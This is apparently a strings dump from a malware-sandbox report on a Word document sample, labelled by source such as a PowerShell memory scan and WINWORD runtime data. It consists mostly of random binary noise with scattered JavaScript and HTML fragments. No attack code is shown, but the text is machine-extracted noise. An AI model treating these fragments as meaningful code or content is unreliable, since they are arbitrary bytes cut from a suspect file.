Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

zZWws^w3"igS[R3;~UiKWAp>q#891SE'n:vkuZ+k'N}|vJipr-={.R_dmp|{W+YwKG

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

zzyjeeH::999r6

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

Z{&"VD;mYZS<:5tk~ApN^j/5nQ{kQWn(5])H#_L6l%rmn8utvz5RPkjO|\zZ-iY'EPDk/[nZ-O#%;7

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

{1oBF+q\]LmyHR).6o

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

{68523B48-9954-4F10-A766-9C8A27B19435}

Unicode based on Runtime Data (WINWORD.EXE )

{<#Xa&erxlEt|?KiRhvpf{}>oE~yCjGt_fV#V'D}f]ZR6w}:]Rc;Lb4iYXOLW?GlHIK*1#];'q>k7<VyotwgImm=irWGUK+dD

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

{^V9m\y=);38}{-?Px\>~yzK_&G}FW,krgG:AU#[rsLN9p>o?&:_d'4k8__K6Ur_rK,}\TF&U';MJG>:=^

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

{m:WR(n)$uFMn"\eq[fgsyBW)uwgY(,KU{mj)+&D%\G'$6;Jkzk{Rz[#hL:m/-v1K\\%3O[7W=SZwqS^#_W|%J<wGIHO3=6Bowl'Ktw`1iJ|5gF'y/Z)[{\ww;bzQkr=78Kug_k5S0Y~!PYd5#9xF]=fIHvBgqw+6<~trtzMfYa1XE+dhnsJxJzg?^OJ%[8i3X|i#.

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

{smuZ3:^8^N7+oQ[h6GZ|ug?fLLD0{LuM/z]nTvv-3cbYKMqn_k=1ck%b^j;?.=G7

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

{V=Ev#7W1<mPZi39sF|/Hx)h*uD5"{5VI~^XQTT\okfL[-u:Vk3nvY6K]~bj}&PTWUY

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

|G lobalSpacFalsedCreatablPredec$laIdTru

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

|U^6KiZv#:4%YEzr;N\@ddWv*s}%g_FI2g{Tz\k$1\Ch'I3WQoc;aKkz1>M 6zkIw3C3?{9?Y5pB-7:yXsj{g>Vu

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

|~i;OU_\Ze^(l1sP9"66|g6yao"lZFy}?ZXVzGSYel;)V.

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

} else if(element.attachEvent){

}#RwiHX_ttjzy1b\~Qnp]IJ<5cxm'w:+)n\){g&[l])N8zI_Br{E~$v|u@<6nmt:^\ymm/S$M-S<<YSQP=-ge=oUL^_Ywfo}mu}\4.H!YZX[GfrI1db/bIy{n_W1`Ocm&tE}|tjm?'JN1<5HLVqO{lVy)i;Gi/5i}by[""8klq9foTDn'}?Cb.XwmX!n&h'+D\oR2RtlKM'zgieIsIpK

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

}$g1k\/X^Nh%{GO

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

})();</script><link rel='stylesheet' id='g1-socials-basic-screen-css' href='http://www.eteensblog.com/wp-content/plugins/g1-socials/css/screen-basic.min.css?ver=1.2.10' type='text/css' media='screen' />

}/* test if browser supports date fields */

}[s#IC$srsf?O)i~zMz-=8wFb;tzvw|R,$FvdurW_gIvXV&EmL\/jQ%m=bm+\"f"7}q'Gh\VkY/'LE[fv6zNMwjNd~kY#i]#%T{UO#n>bN}7v!3m9g[i+:~%8]GX5W9X{Qxjm/He91^51#f%-vw#~Z.?D~2;ptt"?&8iEn%Sy[UKcx?cA:>LMMN?/.mnqsw

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

}function maybePrefixUrlField() {

}ng^||ezthnvxDx`>?o&#fWOtvK~'{y6:lu|o7+E-I~Qws;>

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

}v3y7}=lXo~Pn5mKS"*FTlu6>Z~3.OfuZFp=}mbr$Nx^eC.Lw99)K?V.&ukdTUty&a{Wo2{~\y/;^+ocDN:qa2ak_k1'?4RO6u"z,{*j/('cw)#nE.,}ff{d_Hm1K[m]G}=?wN-,jdl}m9^>?Y=1i]v?H!m2}X60WtZ`oGu{`WHcSOjo^Fj{T/wov]MkrfN7+Z7/1M{|cfO8'~uV5H+%r2M4jgl<y2^-k5N;.g-,rZ[OTTT=~$H=ZZ0hy~W>)KCs6]26,'L(2f6`}G()vseve+)g|*u"~tcFjvZ&h{-<Jf{<+v7Wlb:m+^11"_#phxKk3*K"uokovziF{~9\gdhkvo|rQ64O3U\6|~z_FKZ}m0oN+cyLNd$ev&QenWd[S;5w]".*-;c%&|#_u#V|^<fwgW?F"gfD12q0?Y]D}6_ hRQMEbJ!R>gb"+*ZO

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

}}}||||||x,

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

~@,?=$.g{H6{^bv&*=5KiF2f1F.gKc:.jVXW%]:&VO#z9*f6h=rW42XZ\Fww;=N;9yT-"|Ri{uUwZ2nv^iy;#FsglW/1V8/Wk[r|s~E3vCoQOn]_u}geL((Z7h3dw%Hr/_S7X^OfoW{*;7ZzK xpVro8rbt9{F5K|b%}(l]X~rAQgbn\jrj(%CIgzT:{=Ck811|N)g(gYn\o:#wIt]*o,uCYGY,Fxk<MqcKikI92Lkg?ZW,S+r^{Oy26^1\T%rjp5ex;YnO}y~O3"R'G9QL>;pE'oi^im:K7\S@hO].!U/*52bS<cI9Q'sh+4 >+YrY+Z!'kpF48/w>qFm=wJH}

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

~[R65:>n|nL2v

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

~qFF1$}hx.8N9>3Z)